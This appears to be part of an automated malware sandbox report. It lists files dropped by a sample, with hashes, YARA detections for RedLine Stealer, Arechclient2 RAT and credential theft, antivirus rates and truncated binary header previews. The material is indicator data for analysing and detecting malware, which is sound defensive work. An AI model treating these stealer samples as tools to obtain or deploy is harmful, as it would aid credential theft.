                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):786944
                                                                                                                                                                                                                                    Entropy (8bit):6.809298494568767
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:wvsXZv8km0OHcbGbvzWHz0Hnquwxe+w0ssFWylkkoAbtEjrwfNqbYS2VbICKMIUO:jfPz0Hynw0ssFlSjT7L
                                                                                                                                                                                                                                    MD5:5AEBA331CE853D10C82B56ADC96C9E80
                                                                                                                                                                                                                                    SHA1:A208059F9591712ABF451114815B693AB14A5AB3
                                                                                                                                                                                                                                    SHA-256:EC51C3B08183CFE851DC93877A6F5B38CA8DD2E5D68E014A2B44C98078ED3434
                                                                                                                                                                                                                                    SHA-512:5DAACA835F0C9F5691D79CDDE45EF6887EACA6123F65994F8A90A42FF63B35DF6605F673E671004CC8F61B7EE0671ED9F25841A2D9EFEFF5EFC8DA8391CC6676
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\nkho, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\nkho, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\nkho, Author: ditekSHen
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 65%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......]................................. ........@.. .......................`..............................................T...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......L....>..........T...@............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~-.....UY.).... .....7...%.....~,.....[Y.)....sr...~-.....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~-.....SY.)......~-.....RY.)....~0...%-.&~/.........su...%.0...(...+}....*.0........... ....X..{M...*..0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):786944
                                                                                                                                                                                                                                    Entropy (8bit):6.809298494568767
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:wvsXZv8km0OHcbGbvzWHz0Hnquwxe+w0ssFWylkkoAbtEjrwfNqbYS2VbICKMIUO:jfPz0Hynw0ssFlSjT7L
                                                                                                                                                                                                                                    MD5:5AEBA331CE853D10C82B56ADC96C9E80
                                                                                                                                                                                                                                    SHA1:A208059F9591712ABF451114815B693AB14A5AB3
                                                                                                                                                                                                                                    SHA-256:EC51C3B08183CFE851DC93877A6F5B38CA8DD2E5D68E014A2B44C98078ED3434
                                                                                                                                                                                                                                    SHA-512:5DAACA835F0C9F5691D79CDDE45EF6887EACA6123F65994F8A90A42FF63B35DF6605F673E671004CC8F61B7EE0671ED9F25841A2D9EFEFF5EFC8DA8391CC6676
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\ssfwvk, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\ssfwvk, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\ssfwvk, Author: ditekSHen
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 65%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......]................................. ........@.. .......................`..............................................T...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......L....>..........T...@............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~-.....UY.).... .....7...%.....~,.....[Y.)....sr...~-.....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~-.....SY.)......~-.....RY.)....~0...%-.&~/.........su...%.0...(...+}....*.0........... ....X..{M...*..0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\
                                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):28672
                                                                                                                                                                                                                                    Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\VucRf0jboS.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):294400
                                                                                                                                                                                                                                    Entropy (8bit):6.775734273220201
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3072:OWQIEzppxOM5hr+py88Z2M6Hu/0u3zgxilg/JKh96N1n7eLIcvgfLI97lfm2DcpD:8zOqquB3ExilCU9e1dcULIDfvDofIK
                                                                                                                                                                                                                                    MD5:17342752EC286810D28AA4F324C3E8E5
                                                                                                                                                                                                                                    SHA1:0B76392265510932C5DA48ECCD34F12A907A7A52
                                                                                                                                                                                                                                    SHA-256:BDC140235BCA5526E0F1FC88C14ADF1DDD7956F27F4357B8D283D31EFC767800
                                                                                                                                                                                                                                    SHA-512:3FE29DA5F3263B904D07145677EBDB6035E976F90816DC2C22A5E5932F20EEBBE2F36B5AE1F65E8FFB0D1C4256D8E0B44E711714044F2023BB4C7B14AB902F50
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ku.[Ku.[Ku.[F'e[Uu.[F'Z[.u.[F'[[du.[B.)[Hu.[Ku.[;u.[.._[Ju.[F'a[Ju.[..d[Ju.[RichKu.[................PE..L....4Qd.....................<.......A.......0....@.............................................................................(........h...................`..T....2..8..............................@............0...............................text............................... ..`.rdata...l...0...n..................@..@.data...HL.......r..................@....rsrc....h.......j..................@..@.reloc..T....`.......h..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\VucRf0jboS.exe
                                                                                                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):3884863
                                                                                                                                                                                                                                    Entropy (8bit):7.9982714074161665
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:98304:7goFFJ7lj6j1elkeoTNxPxDZhAryYACWcTIxlN+ba:7guJ7wpfTDPxD0P2YG
                                                                                                                                                                                                                                    MD5:78D3CA6355C93C72B494BB6A498BF639
                                                                                                                                                                                                                                    SHA1:2FA4E5DF74BFE75C207C881A1B0D3BC1C62C8B0E
                                                                                                                                                                                                                                    SHA-256:A1DD547A63B256AA6A16871ED03F8B025226F7617E67B8817A08444DF077B001
                                                                                                                                                                                                                                    SHA-512:1B2DF7BEE2514AEE7EFD3579F5DD33C76B40606D07DBA69A34C45747662FAD61174DB4931BCA02B058830107959205E889FEE74F8CCC9F6E03F9FD111761F4EA
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:PK.........?.X........I......bunch.dat\]...:.... "*...T.......N<wf..X $;.e..)....|u]+...U*V.~.....f.Rje.......@.f.r..V....J-.#U...*..=.T..E.5.Z..&..z...'.k..%..Je.....[5.....P..B...@........G..z[*.-B1....Jz#....%.J...j...W........>62.jK(...........E.T.Q}.j._I..R.TEj.>..O.*.:J%o.......`.f+O...W>.....S.INC.m.6..|wQ.xk.K.....o.D....:.n4....P>..*M._|...P.R@.gW...k..X...MbM.....H....... .....#o.CC.!...1!R.g....Qc "P....Q.3.H.B.F.|...)...........@..W.6..Z..7.9.....d'`_.6.zr%a.....*.7.,...l....h.v......P.O.f..!..Y..#..Y.7..g..v=..k....J...N#\.5.....]......<.VGU.~....,..X.o.k..#..?v..%.0.+...m.(m..ah.JG>.....m..V......kb...B.jX...V$p... ..?.<....^...%KA=0\.(......Q.l>.;x..#W.@@.tIU ...Q............./e.7Ew..}h..^N... ........+.........bRz.........2r.f..u'o..s.}1...j.{.'%.......?..Z..M.....9.|P..W.o...c...3....H\.4..B......;14.65.Q3....24$...2(..9j......!.$..<<....P#b..Lj.D.vG.+.}.T..6tR..b."..o.f...h>.*......Z..5.(....]........
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\VucRf0jboS.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1640960
                                                                                                                                                                                                                                    Entropy (8bit):6.484662993855079
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
                                                                                                                                                                                                                                    MD5:D1BA9412E78BFC98074C5D724A1A87D6
                                                                                                                                                                                                                                    SHA1:0572F98D78FB0B366B5A086C2A74CC68B771D368
                                                                                                                                                                                                                                    SHA-256:CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
                                                                                                                                                                                                                                    SHA-512:8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 18%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\VucRf0jboS.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1329417
                                                                                                                                                                                                                                    Entropy (8bit):7.898171122766659
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:7vktfYOP8kCc3P/X970uBuBFA3S8Fa+/D9kGmk3Lh9AvPG:7vk5H8LIt1e2Sl+if2YG
                                                                                                                                                                                                                                    MD5:1E8237D3028AB52821D69099E0954F97
                                                                                                                                                                                                                                    SHA1:30A6AE353ADDA0C471C6ED5B7A2458B07185ABF2
                                                                                                                                                                                                                                    SHA-256:9387488F9D338E211BE2CB45109BF590A5070180BC0D4A703F70D3CB3C4E1742
                                                                                                                                                                                                                                    SHA-512:A6406D7C18694EE014D59DF581F1F76E980B68E3361AE680DC979606A423EBA48D35E37F143154DD97FE5F066BAF0EA51A2E9F8BC822D593E1CBA70EAD6559F3
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:...BPM.M.oe....Z.I..Y..t.........RIP\u.fZG..cFQ......h...DAO.P\...j...g.T..id..a...^.PttPbo..ei.i.Z..W.y.g..T_..bMVj.wWAP.v]..xQW..tW.kq..._q.B.nn....p.v.Ds.a.F...vT.Yga.o..A\PM..M.]s...u.lp[.sGmuvB.`YB..g.U....HTB[PU.y..moby..N..q...E.EOs.Q.C[C..^oAOo..sfe....wg.Z....Z...R.kx.DS.WYq.]..dXb.[k.xe.eQc..Z..L..IZ.X.f.x..q..u....Y.[ZH..[v..J.dT.I....RA._OW.x.cK..G]...xwZ....f.Nl`.p.ZS.yJ.J.p..`hn.hYg..u....[Qernk....P[.jJ.....l..RNf......ya.s.M...S.^[TyM..U.fFQ...w..v.KFw.X.....oS[h...NRj..UYt.....nM..d..G.R]j.x...Y.C..b....U.as`GOT.......T.d.GVQV...[.Ct[.`w.R..Vc..O.D.`.dH.jm..S[...Q.....LmoTY.D_.IM...uCtDVt.oW..LK.E..........Ek.fxT.e.f.p.a.O....gaQ.g.O..K.N..l.].......f.Z.[o...HVTJB.l.d.GYVD.U.o....^.F..uH.LH.n.f....Hx^kON..kT.Tld.T.KV.[...MM\NL...Z...R....pd......j..m.DhIFCSO..eMf.W..c.C.[..h.....y.^A..S.W...i.n....N.E.w_....QSGKKF.k.d.g..O...r...o..EKUV.....J...r...I..HU...]xFd.aq..GTC.s.a.p..J....r^GYK.P.C.....qH.....a[..V...FJIsJ._.WTIvtKE.k.me[...H..wTw.a....c...n[_.l...f.I....axf`O
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\VucRf0jboS.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1596416
                                                                                                                                                                                                                                    Entropy (8bit):6.46619614175955
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:n2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTcq+PDXx1lWz0v2:DmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
                                                                                                                                                                                                                                    MD5:10D51BECD0BBCE0FAB147FF9658C565E
                                                                                                                                                                                                                                    SHA1:4689A18112FF876D3C066BC8C14A08FD6B7B7A4A
                                                                                                                                                                                                                                    SHA-256:7B2DB9C88F60ED6DD24B1DEC321A304564780FDB191A96EC35C051856128F1ED
                                                                                                                                                                                                                                    SHA-512:29FAF493BB28F7842C905ADC5312F31741EFFB09F841059B53D73B22AEA2C4D41D73DB10BBF37703D6AEB936FFACBC756A3CC85BA3C0B6A6863EF4D27FEFCD29
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..|....p..........................z....}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\VucRf0jboS.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2469936
                                                                                                                                                                                                                                    Entropy (8bit):6.434916453080517
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:Y8UMSn5cV2N9LNwtQ5gRR+moI1axGbYj6QAl4ImDkg7d5lROCDG5yzlC97W+uJUM:QMS5hN9OtQ5gRjoI8xGbYj6QAl4gg7dF
                                                                                                                                                                                                                                    MD5:9FB4770CED09AAE3B437C1C6EB6D7334
                                                                                                                                                                                                                                    SHA1:FE54B31B0DB8665AA5B22BED147E8295AFC88A03
                                                                                                                                                                                                                                    SHA-256:A05B592A971FE5011554013BCFE9A4AAF9CFC633BDD1FE3A8197F213D557B8D3
                                                                                                                                                                                                                                    SHA-512:140FEE6DAF23FE8B7E441B3B4DE83554AF804F00ECEDC421907A385AC79A63164BD9F28B4BE061C2EA2262755D85E14D3A8E7DC910547837B664D78D93667256
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]..<...<...<...D...<...J...<...J).A<...J(..=...D...<...<...?...J,..=...J...<...J...<..Rich.<..........................PE..L... .kU..........................................@..........................0&......&&...@.................................H. ......0"...............%.0 ...."..K...................................C..@...............,..... .@....................text............................... ..`.rdata...=.......>..................@..@.data....-....!....... .............@....rsrc........0".......!.............@..@.reloc...N...."..P...@".............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\VucRf0jboS.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):87278
                                                                                                                                                                                                                                    Entropy (8bit):4.38402884518968
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:X5B5jj6bWG+5cAD2Fno6ktTgDa+0rldAe7VwDb4bWTfmdI7p:X5Ljj6bi512Fn3b0Ie7qgbWd9
                                                                                                                                                                                                                                    MD5:A723BF46048E0BFB15B8D77D7A648C3E
                                                                                                                                                                                                                                    SHA1:8952D3C34E9341E4425571E10F22B782695BB915
                                                                                                                                                                                                                                    SHA-256:B440170853BDB43B66497F701AEE2901080326975140B095A1669CB9DEE13422
                                                                                                                                                                                                                                    SHA-512:CA8EA2F7F3C7AF21B5673A0A3F2611B6580A7ED02EFA2CFD8B343EB644FF09682BDE43B25EF7AAB68530D5CE31DCBD252C382DD336ECB610D4C4EBDE78347273
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:......P..E.o...]k.`...Y.....q.rsD.o.QPk.]fpZl\.R....DG..vyH^Q.....tpW........kgE.p.`O...............X..S.....x.....`.R.fZ.N...M..h...yC..H.O.XMQiV..sq..Ai.lV...Pv..WO].be.sU.nU..rGe.P....BE.MSnb.Lq....o.p..a.s..a..fEa..R..U.sNC.qZwI...XJ.M..H.h.........d.TSZR.UqXFj....Z.U..XTN.......B.CK...S._.^pjLRnbG^.u.D...mx..e......IYlK.l.....p._p.S.l...BZu..q.UG\.U....y.Xdi..Ff...rmqJ..V.AM.os.Oy..FV.._bNiEyiPIL.AW..GD.....che..iGU.oSi.Y..Yt.\].i.x.N.KN.`FKscyQ.M.....pqhieCU.c.ru..Melr.YRAM.Tg.......]..r.b.pP...._..gUo.`QvN.]il..G...q...NP.m.qHi.iiJ_^.[.Y...e.oHy.p.]..a...X.o....A.cL.C.A.._cQp..oD.L.L.O_.ewev.peB.ia..Ay.t.Y\W.]..l.F._i.....^.gDZTDNUj..dDM..o...........m..E........N.X..x...v..Cg....VuJ.k...Ec..JW`^yZ.u.B.im....T...C\.x..Z.G]B....u.r..gn.V...Q...mnN.quc.rM\..S...AjY.oVTa.p.Oebr.g........eC[A....cvqB..Ed..q.kR..BiYg`bQcA.E.XKs.\o.C..qyjUm.o..C..sc.F.xlnVI.q..q.Vs...p.Bg..O.dha..t..O.`x....c.n.....xr...f.ggn.LR[S..Aqk.j..u....nb.`Gd^...b.fYKZ^R..l...c..EbGm.pq..s..qwjn.`P...b..JE...t
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\VucRf0jboS.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):4866096
                                                                                                                                                                                                                                    Entropy (8bit):6.542818068158205
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:1ZRCckM8wwGbtBiRFWSGqCW4FL5wslsAEL1ksS2NHsF3TjZ1I6bqmHC0Jg:1ZRCwrb64XwWsAwFaFXxg
                                                                                                                                                                                                                                    MD5:397926927BCA55BE4A77839B1C44DE6E
                                                                                                                                                                                                                                    SHA1:E10F3434EF3021C399DBBA047832F02B3C898DBD
                                                                                                                                                                                                                                    SHA-256:4F07E1095CC915B2D46EB149D1C3BE14F3F4B4BD2742517265947FD23BDCA5A7
                                                                                                                                                                                                                                    SHA-512:CF54136B977FC8AF7E8746D78676D0D464362A8CFA2213E392487003B5034562EE802E6911760B98A847BDDD36AD664F32D849AF84D7E208D4648BD97A2FA954
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe, Author: Joe Security
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....X..................5..P......`.5.......5...@...........................J.....`.J..........@............................7..N....<...............J.0(...08.............................. 8......................7.......8......................text...h.5.......5................. ..`.itext..<=....5..>....5............. ..`.data....V....5..X....5.............@....bss.....m...@7...... 7..................idata...N....7..P... 7.............@....didata.......8......p7.............@....tls....@.....8......z7..................rdata....... 8......z7.............@..@.reloc.......08......|7.............@..B.rsrc.........<.......<.............@..@..............J.......J.............@..@........................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                                                                    Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                                                                    Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1640960
                                                                                                                                                                                                                                    Entropy (8bit):6.484662993855079
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
                                                                                                                                                                                                                                    MD5:D1BA9412E78BFC98074C5D724A1A87D6
                                                                                                                                                                                                                                    SHA1:0572F98D78FB0B366B5A086C2A74CC68B771D368
                                                                                                                                                                                                                                    SHA-256:CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
                                                                                                                                                                                                                                    SHA-512:8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 18%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1329417
                                                                                                                                                                                                                                    Entropy (8bit):7.898171122766659
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:7vktfYOP8kCc3P/X970uBuBFA3S8Fa+/D9kGmk3Lh9AvPG:7vk5H8LIt1e2Sl+if2YG
                                                                                                                                                                                                                                    MD5:1E8237D3028AB52821D69099E0954F97
                                                                                                                                                                                                                                    SHA1:30A6AE353ADDA0C471C6ED5B7A2458B07185ABF2
                                                                                                                                                                                                                                    SHA-256:9387488F9D338E211BE2CB45109BF590A5070180BC0D4A703F70D3CB3C4E1742
                                                                                                                                                                                                                                    SHA-512:A6406D7C18694EE014D59DF581F1F76E980B68E3361AE680DC979606A423EBA48D35E37F143154DD97FE5F066BAF0EA51A2E9F8BC822D593E1CBA70EAD6559F3
                                                                                                                                                                                                                                    Malicious:false
